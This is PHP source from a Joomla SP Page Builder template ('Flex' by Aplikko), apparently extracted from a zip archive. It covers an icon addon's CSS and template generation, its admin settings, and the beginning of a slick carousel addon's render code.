			foreach($margins_sm as $margin_sm){
				if(empty(trim($margin_sm))){
					$margin_sm_full .= ' 0';
				} else {
					$margin_sm_full .= ' '.$margin_sm;
				}

			}
			$icon_style_sm .= "margin: " . $margin_sm_full . ";\n";
		}

		if(isset($this->addon->settings->margin_xs) && trim($this->addon->settings->margin_xs) != ""){
			$margin_xs_full = '';
			$margins_xs = explode(' ', $this->addon->settings->margin_xs);
			foreach($margins_xs as $margin_xs){
				if(empty(trim($margin_xs))){
					$margin_xs_full .= ' 0';
				} else {
					$margin_xs_full .= ' '.$margin_xs;
				}

			}
			$icon_style_xs .= "margin: " . $margin_xs_full . ";\n";
		}

		$icon_style  = (isset($this->addon->settings->margin) && $this->addon->settings->margin) ? 'margin: ' . $this->addon->settings->margin . ';' : '';
		$icon_style .= (isset($this->addon->settings->height) && $this->addon->settings->height) ? 'height: ' . (int) $this->addon->settings->height . 'px;' : '';
		$icon_style .= (isset($this->addon->settings->width) && $this->addon->settings->width) ? 'width: ' . (int) $this->addon->settings->width . 'px;' : '';
		$icon_style .= (isset($this->addon->settings->color) && $this->addon->settings->color) ? 'color: ' . $this->addon->settings->color . ';' : '';
		
		// Padding
		$icon_style .= (isset($this->addon->settings->padding) && $this->addon->settings->padding) ? 'padding: ' . (int) $this->addon->settings->padding . 'px;' : '';
		//$icon_style_sm .= (isset($this->addon->settings->padding_sm) && $this->addon->settings->padding_sm) ? 'padding: ' . (int) $this->addon->settings->padding_sm . 'px;' : '';
		//$icon_style_xs .= (isset($this->addon->settings->padding_xs) && $this->addon->settings->padding_xs) ? 'padding: ' . (int) $this->addon->settings->padding_xs . 'px;' : '';
		

		
		
		$icon_style_sm .= (isset($this->addon->settings->height_sm) && $this->addon->settings->height_sm) ? 'height: ' . (int) $this->addon->settings->height_sm . 'px;' : '';
		$icon_style_xs .= (isset($this->addon->settings->height_xs) && $this->addon->settings->height_xs) ? 'height: ' . (int) $this->addon->settings->height_xs . 'px;' : '';

		$font_size = (isset($this->addon->settings->size) && $this->addon->settings->size) ? 'font-size: ' . (int) $this->addon->settings->size . 'px;' : '';
		$font_size .= (isset($this->addon->settings->height) && $this->addon->settings->height) ? 'line-height: ' . (int) $this->addon->settings->height . 'px;' : '';
		$font_size_sm .= (isset($this->addon->settings->height_sm) && $this->addon->settings->height_sm) ? 'line-height: ' . (int) $this->addon->settings->height_sm . 'px;' : '';
		$font_size_xs .= (isset($this->addon->settings->height_xs) && $this->addon->settings->height_xs) ? 'line-height: ' . (int) $this->addon->settings->height_xs . 'px;' : '';

		$icon_style .= (isset($this->addon->settings->width) && $this->addon->settings->width) ? 'width: ' . (int) $this->addon->settings->width . 'px;' : '';
		$icon_style_sm .= (isset($this->addon->settings->width_sm) && $this->addon->settings->width_sm) ? 'width: ' . (int) $this->addon->settings->width_sm . 'px;' : '';
		$icon_style_xs .= (isset($this->addon->settings->width_xs) && $this->addon->settings->width_xs) ? 'width: ' . (int) $this->addon->settings->width_xs . 'px;' : '';

		$icon_style .= (isset($this->addon->settings->color) && $this->addon->settings->color) ? 'color: ' . $this->addon->settings->color . ';' : '';
		$icon_style .= (isset($this->addon->settings->background) && $this->addon->settings->background) ? 'background-color: ' . $this->addon->settings->background . ';' : '';
		$icon_style .= (isset($this->addon->settings->border_color) && $this->addon->settings->border_color) ? 'border-style: solid; border-color: ' . $this->addon->settings->border_color . ';' : '';

		$icon_style .= (isset($this->addon->settings->border_width) && $this->addon->settings->border_width) ? 'border-width: ' . (int) $this->addon->settings->border_width . 'px;' : '';
		$icon_style_sm .= (isset($this->addon->settings->border_width_sm) && $this->addon->settings->border_width_sm) ? 'border-width: ' . (int) $this->addon->settings->border_width_sm . 'px;' : '';
		$icon_style_xs .= (isset($this->addon->settings->border_width_xs) && $this->addon->settings->border_width_xs) ? 'border-width: ' . (int) $this->addon->settings->border_width_xs . 'px;' : '';

		$icon_style .= (isset($this->addon->settings->border_radius) && $this->addon->settings->border_radius) ? 'border-radius: ' . (int) $this->addon->settings->border_radius . 'px;' : '';
		$icon_style_sm .= (isset($this->addon->settings->border_radius_sm) && $this->addon->settings->border_radius_sm) ? 'border-radius: ' . (int) $this->addon->settings->border_radius_sm . 'px;' : '';
		$icon_style_xs .= (isset($this->addon->settings->border_radius_xs) && $this->addon->settings->border_radius_xs) ? 'border-radius: ' . (int) $this->addon->settings->border_radius_xs . 'px;' : '';

		$font_size .= (isset($this->addon->settings->size) && $this->addon->settings->size) ? 'font-size: ' . (int) $this->addon->settings->size . 'px;' : '';
		$font_size_sm .= (isset($this->addon->settings->size_sm) && $this->addon->settings->size_sm) ? 'font-size: ' . (int) $this->addon->settings->size_sm . 'px;' : '';
		$font_size_xs .= (isset($this->addon->settings->size_xs) && $this->addon->settings->size_xs) ? 'font-size: ' . (int) $this->addon->settings->size_xs . 'px;' : '';

		$font_size .= (isset($this->addon->settings->border_width) && $this->addon->settings->border_width) ? 'margin-top: -' . (int) $this->addon->settings->border_width . 'px;' : '';
		$font_size_sm .= (isset($this->addon->settings->border_width_sm) && $this->addon->settings->border_width_sm) ? 'margin-top: -' . (int) $this->addon->settings->border_width_sm . 'px;' : '';
		$font_size_xs .= (isset($this->addon->settings->border_width_xs) && $this->addon->settings->border_width_xs) ? 'margin-top: -' . (int) $this->addon->settings->border_width_xs . 'px;' : '';

		// Mouse Hover
		$icon_style_hover  = '';
		$icon_style_hover_sm  = '';
		$icon_style_hover_xs  = '';

		$icon_style_hover  .= (isset($this->addon->settings->hover_color) && $this->addon->settings->hover_color) ? 'color: ' . $this->addon->settings->hover_color . ';' : '';
		$icon_style_hover .= (isset($this->addon->settings->hover_background) && $this->addon->settings->hover_background) ? 'background-color: ' . $this->addon->settings->hover_background . ';' : '';
		$icon_style_hover .= (isset($this->addon->settings->hover_border_color) && $this->addon->settings->hover_border_color) ? 'border-color: ' . $this->addon->settings->hover_border_color . ';' : '';

		$icon_style_hover .= (isset($this->addon->settings->hover_border_width) && $this->addon->settings->hover_border_width) ? 'border-width: ' . (int) $this->addon->settings->hover_border_width . 'px;' : '';
		$icon_style_hover_sm .= (isset($this->addon->settings->hover_border_width_sm) && $this->addon->settings->hover_border_width_sm) ? 'border-width: ' . (int) $this->addon->settings->hover_border_width_sm . 'px;' : '';
		$icon_style_hover_xs .= (isset($this->addon->settings->hover_border_width_xs) && $this->addon->settings->hover_border_width_xs) ? 'border-width: ' . (int) $this->addon->settings->hover_border_width_xs . 'px;' : '';

		$icon_style_hover .= (isset($this->addon->settings->hover_border_radius) && $this->addon->settings->hover_border_radius) ? 'border-radius: ' . (int) $this->addon->settings->hover_border_radius . 'px;' : '';
		$icon_style_hover_sm .= (isset($this->addon->settings->hover_border_radius_sm) && $this->addon->settings->hover_border_radius_sm) ? 'border-radius: ' . (int) $this->addon->settings->hover_border_radius_sm . 'px;' : '';
		$icon_style_hover_xs .= (isset($this->addon->settings->hover_border_radius_xs) && $this->addon->settings->hover_border_radius_xs) ? 'border-radius: ' . (int) $this->addon->settings->hover_border_radius_xs . 'px;' : '';

		$css = '';
		if($icon_style) {
			$css .= $addon_id . ' .sppb-icon-inner {';
			$css .= $icon_style;
			$css .= "\n" . '}' . "\n"	;
		}

		if($font_size) {
			$css .= $addon_id . ' .sppb-icon-inner i {';
			$css .= $font_size;
			$css .= "\n" . '}' . "\n"	;
		}

		// Hover
		if($icon_style_hover) {
			$css .= $addon_id . ' .sppb-icon-inner:hover {';
			$css .= $icon_style_hover;
			$css .= "\n" . '}' . "\n"	;
		}

		if(!empty($icon_style_hover_sm) || !empty($icon_style_sm) || !empty($font_size_sm)) {
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
				if($icon_style_sm) {
					$css .= $addon_id . ' .sppb-icon-inner {';
					$css .= $icon_style_sm;
					$css .= "\n" . '}' . "\n"	;
				}

				if($font_size_sm) {
					$css .= $addon_id . ' .sppb-icon-inner i {';
					$css .= $font_size_sm;
					$css .= "\n" . '}' . "\n"	;
				}

				// Hover
				if($icon_style_hover_sm) {
					$css .= $addon_id . ' .sppb-icon-inner:hover {';
					$css .= $icon_style_hover_sm;
					$css .= "\n" . '}' . "\n"	;
				}
			$css .= '}';
		}

		if(!empty($icon_style_hover_xs) || !empty($icon_style_xs) || !empty($font_size_xs)) {
			$css .= '@media (max-width: 767px) {';
				if($icon_style_xs) {
					$css .= $addon_id . ' .sppb-icon-inner {';
					$css .= $icon_style_xs;
					$css .= "\n" . '}' . "\n"	;
				}

				if($font_size_xs) {
					$css .= $addon_id . ' .sppb-icon-inner i {';
					$css .= $font_size_xs;
					$css .= "\n" . '}' . "\n"	;
				}

				// Hover
				if($icon_style_hover_xs) {
					$css .= $addon_id . ' .sppb-icon-inner:hover {';
					$css .= $icon_style_hover_xs;
					$css .= "\n" . '}' . "\n"	;
				}
			$css .= '}';
		}

		return $css;
	}
	
	public static function getTemplate() {
		$output = '
		<#
			var margin = "";
			var margin_sm = "";
			var margin_xs = "";
			if(data.margin){
				if(_.isObject(data.margin)){
					if(data.margin.md.trim() != ""){
						margin = data.margin.md.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
					if(data.margin.sm.trim() != ""){
						margin_sm = data.margin.sm.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
					if(data.margin.xs.trim() != ""){
						margin_xs = data.margin.xs.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				} else {
					if(data.margin.trim() != ""){
						margin = data.margin.split(" ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				}

			}
		#>
		<style type="text/css">
		#sppb-addon-{{ data.id }} .sppb-icon-inner {
		
			margin: {{ margin }};
			padding: {{ data.padding }}px;
			<# if(_.isObject(data.height)){ #>
				height: {{ data.height.md }}px;
			<# } else { #>
				height: {{ data.height }}px;
			<# } #>
			<# if(_.isObject(data.width)){ #>
				width: {{ data.width.md }}px;
			<# } else { #>
				width: {{ data.width }}px;
			<# } #>
			color: {{ data.color }};
			background-color: {{ data.background }};
			<# if(data.border_width){ #>
				border-style: solid;
				border-color: {{ data.border_color }};
				<# if(_.isObject(data.border_width)){ #>
					border-width: {{ data.border_width.md }}px;
				<# } else { #>
					border-width: {{ data.border_width }}px;
				<# } #>
			<# } #>
			<# if(_.isObject(data.border_radius)){ #>
				border-radius: {{ data.border_radius.md }}px;
			<# } else { #>
				border-radius: {{ data.border_radius }}px;
			<# } #>
		}
		#sppb-addon-{{ data.id }} .sppb-icon-inner i{
			<# if(_.isObject(data.size)){ #>
				font-size: {{ data.size.md }}px;
			<# } else { #>
				font-size: {{ data.size }}px;
			<# } #>

			<# if(_.isObject(data.height)){ #>
				line-height: {{ data.height.md }}px;
			<# } else { #>
				line-height: {{ data.height }}px;
			<# } #>

			<# if(data.border_width){ #>
				<# if(_.isObject(data.border_width)){ #>
					margin-top: -{{ data.border_width.md }}px;
				<# } else { #>
					margin-top: -{{ data.border_width }}px;
				<# } #>
			<# } #>
		}
		#sppb-addon-{{ data.id }} .sppb-icon-inner:hover {
			color: {{ data.hover_color }};
			background-color: {{ data.hover_background }};
			border-color: {{ data.hover_border_color }};

			<# if(_.isObject(data.hover_border_width)){ #>
				border-width: {{ data.hover_border_width.md }}px;
			<# } else { #>
				border-width: {{ data.hover_border_width }}px;
			<# } #>

			<# if(_.isObject(data.hover_border_radius)){ #>
				border-radius: {{ data.hover_border_radius.md }}px;
			<# } else { #>
				border-radius: {{ data.hover_border_radius }}px;
			<# } #>
		}
		@media (min-width: 768px) and (max-width: 991px) {
			#sppb-addon-{{ data.id }} .sppb-icon-inner {
				margin: {{ margin_sm }};
				<# if(_.isObject(data.height)){ #>
					height: {{ data.height.sm }}px;
				<# } #>
				<# if(_.isObject(data.width)){ #>
					width: {{ data.width.sm }}px;
				<# } #>
				<# if(data.border_width){ #>
					<# if(_.isObject(data.border_width)){ #>
						border-width: {{ data.border_width.sm }}px;
					<# } #>
				<# } #>
				<# if(_.isObject(data.border_radius)){ #>
					border-radius: {{ data.border_radius.sm }}px;
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-icon-inner i{
				<# if(_.isObject(data.size)){ #>
					font-size: {{ data.size.sm }}px;
				<# } #>

				<# if(_.isObject(data.height)){ #>
					line-height: {{ data.height.sm }}px;
				<# } #>
				<# if(data.border_width){ #>
					<# if(_.isObject(data.border_width)){ #>
						margin-top: -{{ data.border_width.sm }}px;
					<# } #>
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-icon-inner:hover {
				<# if(_.isObject(data.hover_border_width)){ #>
					border-width: {{ data.hover_border_width.sm }}px;
				<# } #>

				<# if(_.isObject(data.hover_border_radius)){ #>
					border-radius: {{ data.hover_border_radius.sm }}px;
				<# } #>
			}
		}
		@media (max-width: 767px) {
			#sppb-addon-{{ data.id }} .sppb-icon-inner {
				margin: {{ margin_xs }};
				<# if(_.isObject(data.height)){ #>
					height: {{ data.height.xs }}px;
				<# } #>
				<# if(_.isObject(data.width)){ #>
					width: {{ data.width.xs }}px;
				<# } #>
				<# if(data.border_width){ #>
					<# if(_.isObject(data.border_width)){ #>
						border-width: {{ data.border_width.xs }}px;
					<# } #>
				<# } #>
				<# if(_.isObject(data.border_radius)){ #>
					border-radius: {{ data.border_radius.xs }}px;
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-icon-inner i{
				<# if(_.isObject(data.size)){ #>
					font-size: {{ data.size.xs }}px;
				<# } #>

				<# if(_.isObject(data.height)){ #>
					line-height: {{ data.height.xs }}px;
				<# } #>

				<# if(data.border_width){ #>
					<# if(_.isObject(data.border_width)){ #>
						margin-top: -{{ data.border_width.xs }}px;
					<# } #>
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-icon-inner:hover {
				<# if(_.isObject(data.hover_border_width)){ #>
					border-width: {{ data.hover_border_width.xs }}px;
				<# } #>

				<# if(_.isObject(data.hover_border_radius)){ #>
					border-radius: {{ data.hover_border_radius.xs }}px;
				<# } #>
			}
		}
		</style>
		
		<# if(data.icon_name || data.peicon_name){ #>
			<div class="sppb-icon {{ data.class }}">
				<span class="sppb-icon-inner {{ data.css_class }}">
				<# if(!_.isEmpty(data.peicon_name)){ #>
					<i class="pe {{ data.peicon_name }}"></i>
				<# }else{ #>
					<i class="fa {{ data.icon_name }}"></i>
				<# } #>
				</span>	
			</div>
		<# } #>
		';

		return $output;
	}

}
PK!�y����(flex/sppagebuilder/addons/icon/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_icon',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_DESC'),
		'category'=>'Media',
		'attr'=>array(

			'general' => array(
				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),
				
				'peicon_name'=>array( // Pixeden Icons
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
					'values'=> $peicon_list
				),

				'icon_name'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
					'std'=> 'fa-cogs'
				),

				'link'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
					'std'=> ''
				),

				'size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE'),
					'std'=>array('md'=>36),
					'max'=>400,
					'responsive'=>true
				),

				'width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WIDTH'),
					'std'=>array('md'=>96),
					'max'=>500,
					'responsive'=>true
				),

				'height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_HEIGHT'),
					'std'=>array('md'=>96),
					'max'=>500,
					'responsive'=>true
				),
				
				'padding'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PADDING_DESC'),
					'placeholder'=>'20',
				),
	
				'color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR'),
				),

				'background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_COLOR'),
				),
				

				'border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR'),
				),

				'border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_WIDTH'),
					'placeholder'=>'3',
					'responsive'=>true
				),

				'border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_RADIUS'),
					'placeholder'=>'5',
					'max'=>500,
					'responsive'=>true
				),

				'margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_DESC'),
					'placeholder'=>'10',
					'responsive'=>true
				),

				'separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MOUSE_HOVER_OPTIONS')
				),

				'use_hover'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_USE_HOVER'),
					'std'=>0,
				),

				'hover_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR_HOVER'),
					'depends'=>array(
						array('use_hover', '=', 1)
					)
				),

				'hover_background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_COLOR_HOVER'),
					'depends'=>array(
						array('use_hover', '=', 1)
					)
				),

				'hover_border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR_HOVER'),
					'depends'=>array(
						array('use_hover', '=', 1)
					)
				),

				'hover_border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_WIDTH'),
					'responsive'=>true,
					'depends'=>array(
						array('use_hover', '=', 1)
					)
				),

				'hover_border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_RADIUS'),
					'max'=>500,
					'responsive'=>true,
					'depends'=>array(
						array('use_hover', '=', 1)
					)
				),

				'hover_effect'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_HOVER_EFFECT'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_HOVER_EFFECT_NONE'),
						'zoom-in'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_HOVER_EFFECT_ZOOM_IN'),
						'zoom-out'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_HOVER_EFFECT_ZOOM_OUT'),
						'rotate'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_HOVER_EFFECT_ROTATE'),
					),
					'std'=>'zoom-in',
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!:d�W�8�81flex/sppagebuilder/addons/slick_carousel/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonSlick_carousel extends SppagebuilderAddons {

	public function render() {

		$doc = JFactory::getDocument();
		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? ' ' . $settings->class : '';
		$lazyloading = (isset($settings->lazyloading) && $settings->lazyloading) ? 1 : 0;
		$spacing = (isset($settings->spacing) && $settings->spacing) ? $settings->spacing : 0;
		$arrows = (isset($settings->arrows) && $settings->arrows) ? 1 : 0;
		$arrows_size = (isset($settings->arrows_size) && $settings->arrows_size) ? $settings->arrows_size : '';
		$arrows_color = (isset($settings->arrows_color) && $settings->arrows_color) ? $settings->arrows_color . ';' : '';
		$arrows_background_color = (isset($settings->arrows_background_color) && $settings->arrows_background_color) ? $settings->arrows_background_color.';' : '';
		$arrows_class = (isset($settings->arrows_class) && $settings->arrows_class) ? ' '. $settings->arrows_class : '';
		$counter = (isset($settings->counter) && $settings->counter) ? 1 : 0;
		$counter_color = (isset($settings->counter_color) && $settings->counter_color) ? 'color:'.$settings->counter_color.';' : 'color:#777;';
		$dots = (isset($settings->dots) && $settings->dots) ? 1 : 0;
		$dots_color = (isset($settings->dots_color) && $settings->dots_color) ? 'color:'. $settings->dots_color .';' : '';
		$rtl_support = (isset($settings->rtl_support) && $settings->rtl_support) ? 1 : 0;
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
	
		//Options:
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';
		
		// Title
		$title_fontsize = (isset($settings->title_fontsize) && $settings->title_fontsize) ? $settings->title_fontsize : '';
		$title_fontweight = (isset($settings->title_fontweight) && $settings->title_fontweight) ? $settings->title_fontweight : '';
		$title_text_color = (isset($settings->title_text_color) && $settings->title_text_color) ? $settings->title_text_color : '';
		$title_margin_top = (isset($settings->title_margin_top) && $settings->title_margin_top) ? $settings->title_margin_top : 10;
		$title_margin_bottom = (isset($settings->title_margin_bottom) && $settings->title_margin_bottom) ? $settings->title_margin_bottom : 10;

			if ($dots == '1') {
				//with dots
				$arrows_margin_top = 'margin-top:-' . ( $arrows_size / 1.2 ) . 'px;';
			} else {
				//without dots
				$arrows_margin_top = 'margin-top:-' . ( $arrows_size / 2.2 ) . 'px;';
			}
			
			if($spacing=='') {
				$spacing = 0;
			}

			// RTL Support
	
			if ($rtl_support == 1) { 
				$rtl_support = 'rtl:true,';
				$rtl = ' dir="rtl"';
			} else {
				$rtl_support = '';
				$rtl = '';
			}

			//$arrows_size = '';
			$arrows_size != '' ? $arrows_size_style = 'font-size:'. $arrows_size.'px;' : $arrows_size_style = 'font-size:44px;';
			
			$arrows_color != '' ? $arrows_color_style = 'color:'.$arrows_color.';' : $arrows_color_style = '';
			$arrows_background_color != '' ? $arrows_background_color_style = 'background-color:'.$arrows_background_color.';' : $arrows_background_color_style = '';
			$arrows_class != '' ? $arrows_class = ' '.$arrows_class : $arrows_class = '';
				if ($arrows_size || $arrows_color || $arrows_background_color) {
					$arrow_style = ' style="' . $arrows_size_style . $arrows_color_style . $arrows_background_color_style . '"'; 
				}
			
			$show_counter = '';	
			$counter_height = '';
			$arrows_size != '' ? $counter_height = 'line-height:' . ( $arrows_size - 4 ) . 'px;' : $counter_height = 'line-height:40px;';
			
			// Add styles (old fashion way)
			$style = ''
				. '#slick-carousel-'.$this->addon->id.' .slick-slide{margin:0 ' . $spacing / 2 .'px;}'
				. '#slick-carousel-'.$this->addon->id.' .slick-list{margin:0 ' . $spacing . ';}'
				. '#slick-carousel-'.$this->addon->id.' .slick-prev,#slick-carousel-'.$this->addon->id.' .slick-next {' . $arrows_margin_top . $arrows_background_color_style . '}'
				. '#slick-carousel-'.$this->addon->id.' .slick-dots li button:before {'. $dots_color .'}'
				. '#slick-carousel-'.$this->addon->id.' .slick-prev i.pe, #slick-carousel-'.$this->addon->id.' .slick-next i.pe {'.$arrows_size_style.'color:'.$arrows_color.'}'
				;		 
				$doc->addStyleDeclaration($style);
	
			if ($counter != '0') { 	
				$style_counter = '#slick-carousel-'.$this->addon->id.' .slick-prev .slick-counter {left:-' . $arrows_size . 'px;height:'.$arrows_size.'px;width:' . $arrows_size . 'px;' . $counter_color . $counter_height . '}'
				. '#slick-carousel-'.$this->addon->id.' .slick-next .slick-counter {right:-' . $arrows_size . 'px;height:'.$arrows_size.'px;width:' . $arrows_size . 'px;' . $counter_color . $counter_height . '}';
				$doc->addStyleDeclaration($style_counter);
			}

		// Output starts
		$output = '';
		
		$output = '<div class="sppb-addon ' . $class . '">';
	
		if($title) {
			$title_style = '';
			if($title_margin_top !='') $title_style .= 'margin-top:' . (int) $title_margin_top . 'px;';
			if($title_margin_bottom !='') $title_style .= 'margin-bottom:' . (int) $title_margin_bottom . 'px;';
			if($title_text_color) $title_style .= 'color:' . $title_text_color  . ';';
			if($title_fontsize) $title_style .= 'font-size:'.$title_fontsize.'px;line-height:'.$title_fontsize.'px;';
			if($title_fontweight) $title_style .= 'font-weight:'.$title_fontweight.';';
	
			$output .= '<'.$heading_selector.' class="sppb-addon-title" style="' . $title_style . '">' . $title . '</'.$heading_selector.'>';
		}
	
		$output .= '<div'.$rtl.' id="slick-carousel-'.$this->addon->id.'" class="clearfix">';
	
	    if(isset($settings->sp_slick_carousel_item) && is_array($settings->sp_slick_carousel_item)){
			foreach ($settings->sp_slick_carousel_item as $key => $item_value) {

				$item_title = (isset($item_value->item_title) && $item_value->item_title) ? $item_value->item_title : '';
				$thumb = (isset($item_value->thumb) && $item_value->thumb) ? $item_value->thumb : '';
				$alt_text = (isset($item_value->alt_text) && $item_value->alt_text) ? $item_value->alt_text : '';
				$thumb_url = (isset($item_value->thumb_url) && $item_value->thumb_url) ? $item_value->thumb_url : '';
				$url_target = (isset($item_value->url_target) && $item_value->url_target) ? ' target="' . $item_value->url_target . '"' : '';
				$description = (isset($item_value->description) && $item_value->description) ? $item_value->description : '';
	
				if($item_title!='') {
					 $maintitle = '<h3>' . nl2br($item_title) . '</h3>';
				} else {
					$maintitle = '';
				}
	
				// Image
				if($thumb) {
					
					if (empty($alt_text)) {
						if (!empty($item_title)) {
							$alt_text = $item_title;
						} else {
							$alt_text = basename($thumb);
						}
					}

					$output .= '<div class="slick-img">';
					$output .= '';
					$output .= ($thumb_url !='') ? '<a href="'.$thumb_url.'"'.$url_target.'>' : '';
					$output .= '<img ';
					
					if(strpos($thumb, 'http://') !== false || strpos($thumb, 'https://') !== false){
						$output .= ($lazyloading == 1) ? 'data-lazy="'. $thumb . '" alt="'. $alt_text .'"' : 'src="'. $thumb . '" alt="'. $item_title. '"';
					} else {
						$output .= ($lazyloading == 1) ? 'data-lazy="'. JURI::base(true) . '/' . $thumb . '" alt="'. $alt_text .'"' : 'src="'. $thumb . '" alt="'. $item_title. '"';
					}
					$output .= '>';
					$output .= ($thumb_url !='') ? '</a>' : '';
					$output .= ($item_title != '') ? '<div class="clearfix"><h3>' . nl2br($item_title) . '</h3></div>' : '';
					$output .= $description != '' ? '<div class="slick-desc">' . $description . '</div>' : '';
					$output .= '</div>';
				} else {
					$output .= '<div class="slick-img no-bckg-img">';	
					$output .= $description != '' ? '<div class="slick-desc">' . $maintitle . $description . '</div>' : '';
					$output .= '</div>';
				}
			}
		}
		$output .= '</div>';	
		$output .= '</div>';

		return $output;
	}

	public function stylesheets() {
		$app = JFactory::getApplication();
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();	
		return array($tmplPath.'/sppagebuilder/addons/slick_carousel/assets/css/slick.css');
	}

	public function scripts() {
		$app = JFactory::getApplication();
		$tmplPath = JURI::base(true) . '/templates/'.$app->getTemplate();	
		
		return array($tmplPath.'/sppagebuilder/addons/slick_carousel/assets/js/slick.min.js');
	}

	public function js() {
		$settings = $this->addon->settings;
		$infiniteloop = (isset($settings->infiniteloop) && $settings->infiniteloop) ? 1 : 0;
		$lazyloading = (isset($settings->lazyloading) && $settings->lazyloading) ? $lazyloading = 'lazyLoad:\'ondemand\',' : '';
		$slidestoshow = (isset($settings->slidestoshow) && $settings->slidestoshow) ? $settings->slidestoshow : 1;
		$slidestoscroll = (isset($settings->slidestoscroll) && $settings->slidestoscroll) ? $settings->slidestoscroll : 1;
		$spacing = (isset($settings->spacing) && $settings->spacing) ? $settings->spacing : 0;
		$fade_effect = (isset($settings->fade_effect) && $settings->fade_effect) ? 1 : 0;
